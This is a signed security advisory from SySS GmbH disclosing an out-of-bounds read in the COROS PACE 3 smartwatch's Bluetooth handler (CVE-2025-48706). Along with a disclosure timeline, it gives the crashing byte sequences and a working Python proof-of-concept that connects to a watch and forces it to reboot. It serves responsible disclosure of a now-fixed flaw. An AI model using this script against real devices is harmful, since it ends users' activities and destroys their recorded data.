-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-028
Product:                   COROS PACE 3; other models might also be affected [6]
Manufacturer:              COROS Wearables, Inc.
Affected Version(s):       <= V 3.1008.0
Tested Version(s):         V 3.0808.0
Vulnerability Type:        Out-of-bounds Read (CWE-125)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2025-03-14
Solution Date:             July/August (see vendor notes[6])
Public Disclosure:         2025-06-17
CVE Reference:             CVE-2025-48706
Author of Advisory:        Moritz Abrell, SySS GmbH
                           Jan Wütherich, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The COROS PACE 3 is a professional GPS sport smart watch.

The manufacturer describes the product as follows (see [1]):

"Improving on its legendary predecessor in every way, PACE 3 packs an 
even more powerful punch. Track your training and recovery with a watch 
that's lightweight and comfortable, with advanced technology, 
outstanding data accuracy, and backed by the industry-leading COROS 
training software system. The COROS PACE 3 paves the way to discover 
your potential."

Due to an out-of-bounds (OOB) vulnerability, sending a specially crafted
Bluetooth Low Energy (BLE) message forces the device to reboot.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Connecting to the COROS PACE 3 and writing the following byte sequences
to the characteristic with the UUID "6e400002-b5a3-f393-e0a9-77656c6f6f70" 
forces the watch to reboot:

b900
0000

If exploited during an ongoing activity, it leads to the termination 
of the activity itself and the loss of the recorded data.

Requests sent to this characteristic are handled by the 
ble_protocol_cmd_receive function. 
This function expects 16-bit packets containing a command field as the 
first byte:

    0         8  16
    +-------------+
    | Command | 0 |
    +-------------+

After sending the command 0xB9 an additional packet from the same 
connection ID can be received.
The function expects the packet to contain additional data over which an 
8-bit checksum will be calculated. 
The checksum is validated against the last byte of the packet:

    0   8   16     n-8        n
    +-------------------------+
    | 0 | 0 | Data | Checksum |
    +-------------------------+

The following code describes how the checksum is calculated:

    char* data = (char*) packet + 2;
    unsigned data_size = packet_size - 3;
    char checksum = calculate_checksum(data, data_size);
    if (payload[data_size] == checksum)
        // pass
    else
        // fail

Sending a packet that is only 2 bytes in size causes an underflow in 
the 32-bit data_size variable, resulting in the value 0xFFFFFFFF to be 
passed to the calculate_checksum function as the buffer size.
As a result, calculate_checksum reads past the end of the buffer until 
it reaches the end of the memory bounds, at which point a data abort 
is raised.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following proof-of-concept script connects to a COROS PACE 3
and triggers the denial-of-service vulnerability:

####################
import asyncio
from bleak import BleakClient
import sys

DEVICE_ADDRESS = "F7:AF:1D:27:03:b0"
CHARACTERISTIC_UUID = "6e400002b5a3f393e0a977656c6f6f70"

DATA1 = bytes.fromhex("b900")
DATA2 = bytes.fromhex("0000")

async def write_to_ble_device():
    client = BleakClient(DEVICE_ADDRESS)
    try:
        await client.connect()
        await asyncio.sleep(2)  
        if client.is_connected:
            print(f"connected to {DEVICE_ADDRESS}")
            await client.write_gatt_char(CHARACTERISTIC_UUID, DATA1, response=False)
            await client.write_gatt_char(CHARACTERISTIC_UUID, DATA2, response=False)
            print("Press ctrl-c to disconnect")
            await asyncio.Event().wait()
    except Exception as e:
        print(f"Error: {e}")
    finally:
        if client.is_connected:
            await client.disconnect()

asyncio.run(write_to_ble_device())
####################

# Executing the script results in a reboot of the watch: 
    $ python3 poc.py

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to vendor note [6], the vulnerability was addressed in patches 
for several devices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-03-10: Vulnerability discovered
2025-03-14: Vulnerability reported to manufacturer
2025-03-14: Confirmation of receipt received
2025-03-17: Asked the manufacturer for an update
2025-03-31: More information provided to the manufacturer
2025-04-07: Asked the manufacturer for an update
2025-04-14: Asked once again for an update
2025-04-15: Answer received from the manufacturer; manufacturer informed
            SySS GmbH that a fix is planned for June, 2025
2025-04-15: Receipt confirmed
2025-05-26: More detailed information provided to the manufacturer
2025-05-26: Manufacturer confirmed receipt
2025-06-17: Public disclosure
2025-08-06: The vendor notified us of updates to the security patch notes
2025-08-11: Advisory update

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] COROS PACE 3 product website
    https://eu.coros.com/pace3
[2] SySS Security Advisory SYSS-2025-028
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-028.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] CVE-2025-48706
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-48706
[5] Detailed blog post:
    https://blog.syss.com/posts/bluetooth-analysis-coros-pace-3/
[6] Vendor notes about the vulnerability and security patches:
    https://support.coros.com/hc/en-us/articles/38933102526996-Bluetooth-Security-Vulnerability-Statement

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell and Jan Wütherich 
of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmiZ3a4ACgkQrgyb+PE0
i1PsthAAl+q+E5kmjAvykTJX9kPOs1aGy1QE4sYzNLXRZGoA4zqxvsNymEx/EmNF
1lzzdC0XH3kOwcKm7tr/PdvHGFs05L7LwpUla1mhApsz+yQl90q2hwQ+hQf8hPOX
NFFxVtdqtvyQVqOeQpfBw8wdukEhJZP0nocPR9855Wg1VOfWijuuSfP3P6lKkWsM
x2O0KKy+tWFMsJxFSdsiXDmm4dhxRdgc35LiCze7Zjqo4KIo+iNUVH/c/QnXlfRz
yYLd3AmwM8t2Dh1reJEHQb29l6lf01coCY5R0EvzBFyohMpJZSVVEnYwPn5yekAD
KQycqG/uhCoZKogOH95/Ifso7p48wcLPqqhHnTRyCcfJSL9096ji/OPtkY7bxmiu
00xnE1zTU8bJXlVSqkYmRqrLdP2E12sQRGZp7s4zFc2oqtIGKc4nRydwIRVskPAr
hDxGnihlljuyg4tTU9huwmnbMD0awFXYNtd/mb0zBpFEOu1ahgCS+aoa42BO9nbF
kwS9pF8+mKoS9kNzBhjnfN0v07LUy89i3bIxNsz/AiWgxT3ROp+Zl51dDJ7BQ9hP
V5PMpCo2Q4KUmNYV05p/THxWMqWJw2KJm2bB/RwV4fZFm9oEYqsKCEmHmoMyCXNn
+yHBCnQuJwCqXWi4bZJjn3TFg9xGbnG9a158om9ymBUOR72DDBc=
=hpqY
-----END PGP SIGNATURE-----